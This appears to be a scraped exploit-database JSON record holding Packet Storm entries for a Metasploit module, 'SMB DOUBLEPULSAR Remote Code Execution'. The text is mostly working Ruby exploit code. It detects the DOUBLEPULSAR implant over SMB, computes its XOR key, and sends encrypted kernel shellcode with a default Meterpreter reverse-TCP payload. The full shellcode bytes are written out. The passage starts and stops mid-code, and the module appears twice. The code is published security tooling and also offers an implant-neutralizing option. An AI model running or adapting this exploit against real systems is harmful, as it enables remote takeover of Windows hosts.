0x#{@xor_key.to_s(16).upcase}\") \nCheckCode::Vulnerable \nwhen :not_detected \nvprint_error('DOUBLEPULSAR not detected or disabled') \nCheckCode::Safe \nelse \nvprint_error('An unknown error occurred') \nCheckCode::Unknown \nend \nend \n \ndef exploit \nif datastore['DefangedMode'] \nwarning = <<~EOF \n \n \nAre you SURE you want to execute code against a nation-state implant? \nYou MAY contaminate forensic evidence if there is an investigation. \n \nDisable the DefangedMode option if you have authorization to proceed. \nEOF \n \nfail_with(Failure::BadConfig, warning) \nend \n \n# No ForceExploit because @tree_id and @xor_key are required \nunless check == CheckCode::Vulnerable \nfail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') \nend \n \ncase target.name \nwhen 'Execute payload' \nunless @xor_key \nfail_with(Failure::NotFound, 'XOR key not found') \nend \n \nif @arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'x86 is not a supported target') \nend \n \nprint_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\") \nshellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) \nshellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length) \nvprint_status(\"Total shellcode length: #{shellcode.length} bytes\") \n \nprint_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\") \nxor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode) \n \nprint_status('Sending shellcode to DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode) \nwhen 'Neutralize implant' \nreturn neutralize_implant \nend \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Payload execution successful') \nwhen :invalid_params \nfail_with(Failure::BadConfig, 'Invalid parameters were specified') \nwhen :alloc_failure \nfail_with(Failure::PayloadFailed, 'An allocation failure occurred') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nensure \ndisconnect \nend \n \ndef neutralize_implant \nprint_status('Neutralizing DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill]) \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Implant neutralization successful') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nend \n \ndef do_smb_setup_tree(ipc_share) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nsimple.connect(ipc_share) \n \n# return tree \nsimple.shares[ipc_share] \nend \n \ndef do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) \n# make doublepulsar knock \npkt = make_smb_trans2_doublepulsar(opcode, body) \n \nsock.put(pkt) \nbytes = sock.get_once \n \nreturn unless bytes \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \nreturn pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2'] \nend \n \ndef make_smb_trans2_doublepulsar(opcode, body) \nsetup_count = 1 \nsetup_data = [0x000e].pack('v') \n \nparam = generate_doublepulsar_param(opcode, body) \ndata = param + body.to_s \n \npkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0xc007 \n \n@multiplex_id = rand(0xffff) \n \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload']['SMB'].v['TreeID'] = @tree_id \npkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.to_s.length \npkt['Payload'].v['ParamCountMax'] = 1 \npkt['Payload'].v['DataCountMax'] = 0 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.to_s.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode) \npkt['Payload'].v['Payload'] = data \n \npkt.to_s \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \ndef make_kernel_user_payload(ring3, proc_name) \nsc = make_kernel_shellcode(proc_name) \n \nsc << [ring3.length].pack(\"S<\") \nsc << ring3 \n \nsc \nend \n \ndef generate_process_hash(process) \n# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \nproc_hash = 0 \nprocess << \"\\x00\" \n \nprocess.each_byte do |c| \nproc_hash = ror(proc_hash, 13) \nproc_hash += c \nend \n \n[proc_hash].pack('l<') \nend \n \ndef ror(dword, bits) \n(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF \nend \n \ndef make_kernel_shellcode(proc_name) \n# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \n# Length: 780 bytes \n\"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" + \n\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" + \n\"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" + \n\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" + \n\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" + \n\"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" + \n\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" + \n\"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" + \n\"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" + \n\"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" + \n\"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" + \n\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" + \n\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" + \ngenerate_process_hash(proc_name.upcase) + \n\"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" + \n\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" + \n\"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" + \n\"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" + \n\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" + \n\"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" + \n\"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" + \n\"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" + \n\"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" + \n\"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" + \n\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" + \n\"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" + \n\"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" + \n\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" + \n\"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" + \n\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" + \n\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" + \n\"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" + \n\"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" + \n\"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" + \n\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" + \n\"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" + \n\"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" + \n\"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" + \n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" + \n\"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" + \n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" + \n\"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" + \n\"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" + \n\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" + \n\"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" + \n\"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" + \n\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" + \n\"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" + \n\"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" + \n\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\" \nend \n \ndef kernel_shellcode_size \nmake_kernel_shellcode('').length \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/154690/doublepulsar_rce.rb.txt"}, {"lastseen": "2020-02-06T14:50:28", "description": "", "cvss3": {}, "published": "2020-02-04T00:00:00", "type": "packetstorm", "title": "SMB DOUBLEPULSAR Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2020-02-04T00:00:00", "id": "PACKETSTORM:156196", "href": "https://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::SMB::Client \ninclude Msf::Module::Deprecated \n \nmoved_from 'exploit/windows/smb/doublepulsar_rce' \n \nMAX_SHELLCODE_SIZE = 4096 \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SMB DOUBLEPULSAR Remote Code Execution', \n'Description' => %q{ \nThis module executes a Metasploit payload against the Equation Group's \nDOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. \n \nWhile this module primarily performs code execution against the implant, \nthe \"Neutralize implant\" target allows you to disable the implant. \n}, \n'Author' => [ \n'Equation Group', # DOUBLEPULSAR implant \n'Shadow Brokers', # Equation Group dump \n'zerosum0x0', # DOPU analysis and detection \n'Luke Jennings', # DOPU analysis and detection \n'wvu', # Metasploit module and arch detection \n'Jacob Robles' # Metasploit module and RCE help \n], \n'References' => [ \n['MSB', 'MS17-010'], \n['CVE', '2017-0143'], \n['CVE', '2017-0144'], \n['CVE', '2017-0145'], \n['CVE', '2017-0146'], \n['CVE', '2017-0147'], \n['CVE', '2017-0148'], \n['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'], \n['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'], \n['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], \n['URL', 'https://github.com/countercept/doublepulsar-detection-script'], \n['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], \n['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] \n], \n'DisclosureDate' => '2017-04-14', # Shadow Brokers leak \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_X64, \n'Privileged' => true, \n'Payload' => { \n'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, \n'DisableNops' => true \n}, \n'Targets' => [ \n['Execute payload (x64)', \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n], \n['Neutralize implant', \n'DefaultOptions' => { \n'PAYLOAD' => nil # XXX: \"Unset\" generic payload \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['DOUBLEPULSAR'], \n'RelatedModules' => [ \n'auxiliary/scanner/smb/smb_ms17_010', \n'exploit/windows/smb/ms17_010_eternalblue' \n], \n'Stability' => [CRASH_OS_DOWN], \n'Reliability' => [REPEATABLE_SESSION] \n} \n)) \n \nregister_advanced_options([ \nOptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), \nOptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe']) \n]) \nend \n \nOPCODES = { \nping: 0x23, \nexec: 0xc8, \nkill: 0x77 \n}.freeze \n \nSTATUS_CODES = { \nnot_detected: 0x00, \nsuccess: 0x10, \ninvalid_params: 0x20, \nalloc_failure: 0x30 \n}.freeze \n \ndef calculate_doublepulsar_status(m1, m2) \nSTATUS_CODES.key(m2.to_i - m1.to_i) \nend \n \n# algorithm to calculate the XOR Key for DoublePulsar knocks \ndef calculate_doublepulsar_xor_key(s) \nx = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) \nx & 0xffffffff # this line was added just to truncate to 32 bits \nend \n \n# The arch is adjacent to the XOR key in the SMB signature \ndef calculate_doublepulsar_arch(s) \ns == 0 ? ARCH_X86 : ARCH_X64 \nend \n \ndef generate_doublepulsar_timeout(op) \nk = SecureRandom.random_bytes(4).unpack1('V') \n0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00 \nend \n \ndef generate_doublepulsar_param(op, body) \ncase OPCODES.key(op) \nwhen :ping, :kill \n\"\\x00\" * 12 \nwhen :exec \nRex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*')) \nend \nend \n \ndef check \nipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\" \n \n@tree_id = do_smb_setup_tree(ipc_share) \nvprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\") \nvprint_status(\"Target OS is #{smb_peer_os}\") \n \nprint_status('Sending ping to DOUBLEPULSAR') \ncode, signature1, signature2 = do_smb_doublepulsar_pkt \nmsg = 'Host is likely INFECTED with DoublePulsar!' \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \n@xor_key = calculate_doublepulsar_xor_key(signature1) \n@arch = calculate_doublepulsar_arch(signature2) \n \narch_str = \ncase @arch \nwhen ARCH_X86 \n'x86 (32-bit)' \nwhen ARCH_X64 \n'x64 (64-bit)' \nend \n \nprint_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\") \nCheckCode::Vulnerable \nwhen :not_detected \nprint_error('DOUBLEPULSAR not detected or disabled') \nCheckCode::Safe \nelse \nprint_error('An unknown error occurred') \nCheckCode::Unknown \nend \nend \n \ndef exploit \nif datastore['DefangedMode'] \nwarning = <<~EOF \n \n \nAre you SURE you want to execute code against a nation-state implant? \nYou MAY contaminate forensic evidence if there is an investigation. \n \nDisable the DefangedMode option if you have authorization to proceed. \nEOF \n \nfail_with(Failure::BadConfig, warning) \nend \n \n# No ForceExploit because @tree_id and @xor_key are required \nunless check == CheckCode::Vulnerable \nfail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') \nend \n \ncase target.name \nwhen 'Execute payload (x64)' \nunless @xor_key \nfail_with(Failure::NotFound, 'XOR key not found') \nend \n \nif @arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'x86 is not a supported target') \nend \n \nprint_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\") \nshellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) \nshellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length) \nvprint_status(\"Total shellcode length: #{shellcode.length} bytes\") \n \nprint_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\") \nxor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode) \n \nprint_status('Sending shellcode to DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode) \nwhen 'Neutralize implant' \nreturn neutralize_implant \nend \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Payload execution successful') \nwhen :invalid_params \nfail_with(Failure::BadConfig, 'Invalid parameters were specified') \nwhen :alloc_failure \nfail_with(Failure::PayloadFailed, 'An allocation failure occurred') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nensure \ndisconnect \nend \n \ndef neutralize_implant \nprint_status('Neutralizing DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill]) \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Implant neutralization successful') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nend \n \ndef do_smb_setup_tree(ipc_share) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nsimple.connect(ipc_share) \n \n# return tree \nsimple.shares[ipc_share] \nend \n \ndef do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) \n# make doublepulsar knock \npkt = make_smb_trans2_doublepulsar(opcode, body) \n \nsock.put(pkt) \nbytes = sock.get_once \n \nreturn unless bytes \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \nreturn pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2'] \nend \n \ndef make_smb_trans2_doublepulsar(opcode, body) \nsetup_count = 1 \nsetup_data = [0x000e].pack('v') \n \nparam = generate_doublepulsar_param(opcode, body) \ndata = param + body.to_s \n \npkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0xc007 \n \n@multiplex_id = rand(0xffff) \n \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload']['SMB'].v['TreeID'] = @tree_id \npkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.to_s.length \npkt['Payload'].v['ParamCountMax'] = 1 \npkt['Payload'].v['DataCountMax'] = 0 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.to_s.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode) \npkt['Payload'].v['Payload'] = data \n \npkt.to_s \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \ndef make_kernel_user_payload(ring3, proc_name) \nsc = make_kernel_shellcode(proc_name) \n \nsc << [ring3.length].pack('S<') \nsc << ring3 \n \nsc \nend \n \ndef generate_process_hash(process) \n# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \nproc_hash = 0 \nprocess << \"\\x00\" \n \nprocess.each_byte do |c| \nproc_hash = ror(proc_hash, 13) \nproc_hash += c \nend \n \n[proc_hash].pack('l<') \nend \n \ndef ror(dword, bits) \n(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF \nend \n \ndef make_kernel_shellcode(proc_name) \n# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \n# Length: 780 bytes \n\"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\ \n\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\ \n\"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\ \n\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\ \n\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\ \n\"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\ \n\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\ \n\"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\ \n\"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\ \n\"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\ \n\"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\ \n\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\ \n\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" + \ngenerate_process_hash(proc_name.upcase) + \n\"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\ \n\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\ \n\"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\ \n\"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\ \n\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\ \n\"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\ \n\"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\ \n\"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\ \n\"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\ \n\"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\ \n\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\ \n\"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\ \n\"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\ \n\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\ \n\"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\ \n\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\ \n\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\ \n\"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\ \n\"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\ \n\"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\ \n\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\ \n\"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\ \n\"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\ \n\"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\ 